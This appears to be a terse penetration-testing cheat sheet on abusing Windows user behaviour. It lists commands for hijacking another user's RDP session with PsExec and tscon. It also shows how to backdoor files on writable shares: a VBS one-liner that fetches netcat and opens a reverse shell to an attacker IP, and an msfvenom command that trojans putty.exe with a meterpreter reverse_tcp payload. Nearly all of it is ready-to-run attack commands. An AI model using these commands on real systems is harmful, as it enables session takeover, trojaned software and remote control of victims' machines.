Abusing User Behaviour

RDP hijacking

run cmd as administrator

PsExec64.exe -s cmd.exe
query user
tscon <TARGET ID> /dest:<ACTIVE RDP SESSION>

Windows Server < 2019

Bacdooring

Abusing Writable Shares

backdoor a ruglar file used from a share

Backdooring .vbs Scripts

CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True

Backdooring .exe Files

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe

Last updated